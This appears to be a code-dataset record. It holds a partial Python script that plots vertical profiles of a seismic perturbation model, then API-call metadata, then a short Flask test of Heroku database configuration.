lld2xyzr(lat, lon, dep): R_EARTH_KM = 6371.0 r = (R_EARTH_KM-dep)/R_EARTH_KM theta = 90-lat phi = lon z = r*cosd(theta) h = r*sind(theta) x = h*cosd(phi) y = h*sind(phi) return (x, y, z, r) @numba.njit() def cosd(x): return np.cos(np.deg2rad(x)) @numba.njit() def sind(x): return np.sin(np.deg2rad(x)) # def get_value_func(x_mesh, y_mesh, z_mesh, value_mesh): # value_func = RegularGridInterpolator( # (x_mesh, y_mesh, z_mesh), value_mesh, method="nearest") # return value_func @numba.njit() def interp_value(lat, lon, dep, x_mesh, y_mesh, z_mesh, value_mesh): x, y, z, _ = lld2xyzr(lat, lon, dep) distance2 = (x_mesh-x)**2+(y_mesh-y)**2+(z_mesh-z)**2 mindistance2 = np.min(distance2) coors = np.where(distance2 == mindistance2) value = value_mesh[coors[0][0], coors[1][0], coors[2][0]] return value def generate_vertical_profile_grids(lon_list, lat_list, dep_list, hnpts, vnpts): lons = np.linspace(lon_list[0], lon_list[1], hnpts) lats = np.linspace(lat_list[0], lat_list[1], hnpts) deps = np.linspace(dep_list[0], dep_list[1], vnpts) return lons, lats, deps @click.command() @click.option('--lon1', required=True, type=float, help="lon1") @click.option('--lon2', required=True, type=float, help="lon2") @click.option('--lat1', required=True, type=float, help="lat1") @click.option('--lat2', required=True, type=float, help="lat2") @click.option('--dep1', required=True, type=float, help="dep1") @click.option('--dep2', required=True, type=float, help="dep2") @click.option('--data', required=True, type=str, help="the pickle file") @click.option('--parameter', required=True, type=str, help="physicial parameter to plot") @click.option('--hnpts', required=True, type=int, help="horizontal npts") @click.option('--vnpts', required=True, type=int, help="vertical npts") def main(lon1, lon2, lat1, lat2, dep1, dep2, data, parameter, hnpts, vnpts): lon_list = [lon1, lon2] lat_list = [lat1, lat2] dep_list = [dep1, dep2] data_pd_raw = pd.read_pickle(data) # data_pd is too big minlon = min(lon1, lon2) maxlon = max(lon1, lon2) minlat = min(lat1, lat2) maxlat = max(lat1, lat2) mindep = min(dep1, dep2) maxdep = max(dep1, dep2) data_pd = data_pd_raw.loc[(data_pd_raw.lat <= maxlat) & ( data_pd_raw.lat >= minlat) & (data_pd_raw.lon < maxlon) & (data_pd_raw.lon > minlon) & (data_pd_raw.dep >= mindep) & (data_pd_raw.dep <= maxdep)] x_mesh, y_mesh, z_mesh, value_mesh = prepare_data(data_pd, parameter) lons_plot, lats_plot, deps_plot = generate_vertical_profile_grids( lon_list, lat_list, dep_list, hnpts, vnpts) values = np.zeros((hnpts, vnpts)) for ih in range(hnpts): for iv in range(vnpts): values[ih, iv] = interp_value( lats_plot[ih], lons_plot[ih], deps_plot[iv], x_mesh, y_mesh, z_mesh, value_mesh) # print(lats_plot[ih], lons_plot[ih], deps_plot[iv], values[ih, iv]) # plotting part plt.figure() mesh_plot_lat, mesh_plot_dep = np.meshgrid( lats_plot, deps_plot, indexing="ij") # get vmin and vmax vmin_round = round(np.min(values), 2) if(vmin_round < np.min(values)): vmin = vmin_round else: vmin = vmin_round-0.01 vmax_round = round(np.max(values), 2) if(vmax_round > np.max(values)): vmax = vmax_round else: vmax = vmax_round+0.01 print(vmin, vmax, np.max(values), np.min(values), vmin_round, vmax_round) plt.contourf(mesh_plot_lat, mesh_plot_dep, values, 101, cmap=plt.cm.seismic_r) v = np.arange(vmin, vmax, 0.01) plt.colorbar(ticks=v, label="perturbation") plt.gca().invert_yaxis() plt.xlabel( f"latitude(°) between (lon: {lon1}°, lat: {lat1}°) and (lon: {lon2}°, lat: {lat2}°)") plt.ylabel("depth(km)") plt.show() if __name__ == "__main__": main()
[ "matplotlib.pyplot.ylabel", "numpy.arange", "pandas.read_pickle", "matplotlib.pyplot.contourf", "click.option", "numpy.where", "matplotlib.pyplot.xlabel", "numpy.max", "numpy.linspace", "numpy.min", "numpy.meshgrid", "click.command", "matplotlib.pyplot.gca", "numba.njit", "numpy.deg2rad", "numpy.shape", "matplotlib.pyplot.show", "matplotlib.pyplot.colorbar", "numpy.zeros", "matplotlib.pyplot.figure", "numpy.zeros_like" ]
[((1443, 1455), 'numba.njit', 'numba.njit', ([], {}), '()\n', (1453, 1455), False, 'import numba\n'), ((1691, 1703), 'numba.njit', 'numba.njit', ([], {}), '()\n', (1701, 1703), False, 'import numba\n'), ((1753, 1765), 'numba.njit', 'numba.njit', ([], {}), '()\n', (1763, 1765), False, 'import numba\n'), ((2009, 2021), 'numba.njit', 'numba.njit', ([], {}), '()\n', (2019, 2021), False, 'import numba\n'), ((2636, 2651), 'click.command', 'click.command', ([], {}), '()\n', (2649, 2651), False, 'import click\n'), ((2653, 2715), 'click.option', 'click.option', (['"""--lon1"""'], {'required': '(True)', 'type': 'float', 'help': '"""lon1"""'}), "('--lon1', required=True, type=float, help='lon1')\n", (2665, 2715), False, 'import click\n'), ((2717, 2779), 'click.option', 'click.option', (['"""--lon2"""'], {'required': '(True)', 'type': 'float', 'help': '"""lon2"""'}), "('--lon2', required=True, type=float, help='lon2')\n", (2729, 2779), False, 'import click\n'), ((2781, 2843), 'click.option', 'click.option', (['"""--lat1"""'], {'required': '(True)', 'type': 'float', 'help': '"""lat1"""'}), "('--lat1', required=True, type=float, help='lat1')\n", (2793, 2843), False, 'import click\n'), ((2845, 2907), 'click.option', 'click.option', (['"""--lat2"""'], {'required': '(True)', 'type': 'float', 'help': '"""lat2"""'}), "('--lat2', required=True, type=float, help='lat2')\n", (2857, 2907), False, 'import click\n'), ((2909, 2971), 'click.option', 'click.option', (['"""--dep1"""'], {'required': '(True)', 'type': 'float', 'help': '"""dep1"""'}), "('--dep1', required=True, type=float, help='dep1')\n", (2921, 2971), False, 'import click\n'), ((2973, 3035), 'click.option', 'click.option', (['"""--dep2"""'], {'required': '(True)', 'type': 'float', 'help': '"""dep2"""'}), "('--dep2', required=True, type=float, help='dep2')\n", (2985, 3035), False, 'import click\n'), ((3037, 3108), 'click.option', 'click.option', (['"""--data"""'], {'required': '(True)', 'type': 'str', 'help': '"""the pickle file"""'}), "('--data', required=True, type=str, help='the pickle file')\n", (3049, 3108), False, 'import click\n'), ((3110, 3203), 'click.option', 'click.option', (['"""--parameter"""'], {'required': '(True)', 'type': 'str', 'help': '"""physicial parameter to plot"""'}), "('--parameter', required=True, type=str, help=\n 'physicial parameter to plot')\n", (3122, 3203), False, 'import click\n'), ((3200, 3272), 'click.option', 'click.option', (['"""--hnpts"""'], {'required': '(True)', 'type': 'int', 'help': '"""horizontal npts"""'}), "('--hnpts', required=True, type=int, help='horizontal npts')\n", (3212, 3272), False, 'import click\n'), ((3274, 3344), 'click.option', 'click.option', (['"""--vnpts"""'], {'required': '(True)', 'type': 'int', 'help': '"""vertical npts"""'}), "('--vnpts', required=True, type=int, help='vertical npts')\n", (3286, 3344), False, 'import click\n'), ((369, 425), 'numpy.meshgrid', 'np.meshgrid', (['lon_list', 'lat_list', 'dep_list'], {'indexing': '"""ij"""'}), "(lon_list, lat_list, dep_list, indexing='ij')\n", (380, 425), True, 'import numpy as np\n'), ((452, 470), 'numpy.shape', 'np.shape', (['lon_mesh'], {}), '(lon_mesh)\n', (460, 470), True, 'import numpy as np\n'), ((488, 511), 'numpy.zeros_like', 'np.zeros_like', (['lon_mesh'], {}), '(lon_mesh)\n', (501, 511), True, 'import numpy as np\n'), ((525, 548), 'numpy.zeros_like', 'np.zeros_like', (['lon_mesh'], {}), '(lon_mesh)\n', (538, 548), True, 'import numpy as np\n'), ((562, 585), 'numpy.zeros_like', 'np.zeros_like', (['lon_mesh'], {}), '(lon_mesh)\n', (575, 585), True, 'import numpy as np\n'), ((599, 622), 'numpy.zeros_like', 'np.zeros_like', (['lon_mesh'], {}), '(lon_mesh)\n', (612, 622), True, 'import numpy as np\n'), ((636, 659), 'numpy.zeros_like', 'np.zeros_like', (['lon_mesh'], {}), '(lon_mesh)\n', (649, 659), True, 'import numpy as np\n'), ((2209, 2226), 'numpy.min', 'np.min', (['distance2'], {}), '(distance2)\n', (2215, 2226), True, 'import numpy as np\n'), ((2239, 2274), 'numpy.where', 'np.where', (['(distance2 == mindistance2)'], {}), '(distance2 == mindistance2)\n', (2247, 2274), True, 'import numpy as np\n'), ((2448, 2492), 'numpy.linspace', 'np.linspace', (['lon_list[0]', 'lon_list[1]', 'hnpts'], {}), '(lon_list[0], lon_list[1], hnpts)\n', (2459, 2492), True, 'import numpy as np\n'), ((2504, 2548), 'numpy.linspace', 'np.linspace', (['lat_list[0]', 'lat_list[1]', 'hnpts'], {}), '(lat_list[0], lat_list[1], hnpts)\n', (2515, 2548), True, 'import numpy as np\n'), ((2560, 2604), 'numpy.linspace', 'np.linspace', (['dep_list[0]', 'dep_list[1]', 'vnpts'], {}), '(dep_list[0], dep_list[1], vnpts)\n', (2571, 2604), True, 'import numpy as np\n'), ((3524, 3544), 'pandas.read_pickle', 'pd.read_pickle', (['data'], {}), '(data)\n', (3538, 3544), True, 'import pandas as pd\n'), ((4172, 4196), 'numpy.zeros', 'np.zeros', (['(hnpts, vnpts)'], {}), '((hnpts, vnpts))\n', (4180, 4196), True, 'import numpy as np\n'), ((4503, 4515), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (4513, 4515), True, 'import matplotlib.pyplot as plt\n'), ((4551, 4599), 'numpy.meshgrid', 'np.meshgrid', (['lats_plot', 'deps_plot'], {'indexing': '"""ij"""'}), "(lats_plot, deps_plot, indexing='ij')\n", (4562, 4599), True, 'import numpy as np\n'), ((5009, 5087), 'matplotlib.pyplot.contourf', 'plt.contourf', (['mesh_plot_lat', 'mesh_plot_dep', 'values', '(101)'], {'cmap': 'plt.cm.seismic_r'}), '(mesh_plot_lat, mesh_plot_dep, values, 101, cmap=plt.cm.seismic_r)\n', (5021, 5087), True, 'import matplotlib.pyplot as plt\n'), ((5114, 5141), 'numpy.arange', 'np.arange', (['vmin', 'vmax', '(0.01)'], {}), '(vmin, vmax, 0.01)\n', (5123, 5141), True, 'import numpy as np\n'), ((5146, 5189), 'matplotlib.pyplot.colorbar', 'plt.colorbar', ([], {'ticks': 'v', 'label': '"""perturbation"""'}), "(ticks=v, label='perturbation')\n", (5158, 5189), True, 'import matplotlib.pyplot as plt\n'), ((5223, 5329), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['f"""latitude(°) between (lon: {lon1}°, lat: {lat1}°) and (lon: {lon2}°, lat: {lat2}°)"""'], {}), "(\n f'latitude(°) between (lon: {lon1}°, lat: {lat1}°) and (lon: {lon2}°, lat: {lat2}°)'\n )\n", (5233, 5329), True, 'import matplotlib.pyplot as plt\n'), ((5333, 5356), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""depth(km)"""'], {}), "('depth(km)')\n", (5343, 5356), True, 'import matplotlib.pyplot as plt\n'), ((5361, 5371), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (5369, 5371), True, 'import matplotlib.pyplot as plt\n'), ((1735, 1748), 'numpy.deg2rad', 'np.deg2rad', (['x'], {}), '(x)\n', (1745, 1748), True, 'import numpy as np\n'), ((1797, 1810), 'numpy.deg2rad', 'np.deg2rad', (['x'], {}), '(x)\n', (1807, 1810), True, 'import numpy as np\n'), ((4658, 4672), 'numpy.min', 'np.min', (['values'], {}), '(values)\n', (4664, 4672), True, 'import numpy as np\n'), ((4697, 4711), 'numpy.min', 'np.min', (['values'], {}), '(values)\n', (4703, 4711), True, 'import numpy as np\n'), ((4804, 4818), 'numpy.max', 'np.max', (['values'], {}), '(values)\n', (4810, 4818), True, 'import numpy as np\n'), ((4843, 4857), 'numpy.max', 'np.max', (['values'], {}), '(values)\n', (4849, 4857), True, 'import numpy as np\n'), ((4949, 4963), 'numpy.max', 'np.max', (['values'], {}), '(values)\n', (4955, 4963), True, 'import numpy as np\n'), ((4965, 4979), 'numpy.min', 'np.min', (['values'], {}), '(values)\n', (4971, 4979), True, 'import numpy as np\n'), ((5194, 5203), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (5201, 5203), True, 'import matplotlib.pyplot as plt\n')]
from flask import Flask from flask_appconfig import HerokuConfig def create_sample_app(): app = Flask('testapp') HerokuConfig(app) return app def test_herokupostgres(monkeypatch): monkeypatch.setenv('HEROKU_POSTGRESQL_ORANGE_URL', 'heroku-db-uri') app = create_sample_app() assert app.config['SQLALCHEMY_DATABASE_URI'] == 'heroku-db-uri'
[ "flask_appconfig.HerokuConfig", "flask.Flask" ]
[((102, 118), 'flask.Flask', 'Flask', (['"""testapp"""'], {}), "('testapp')\n", (107, 118), False, 'from flask import Flask\n'), ((123, 140), 'flask_appconfig.HerokuConfig', 'HerokuConfig', (['app'], {}), '(app)\n', (135, 140), False, 'from flask_appconfig import HerokuConfig\n')]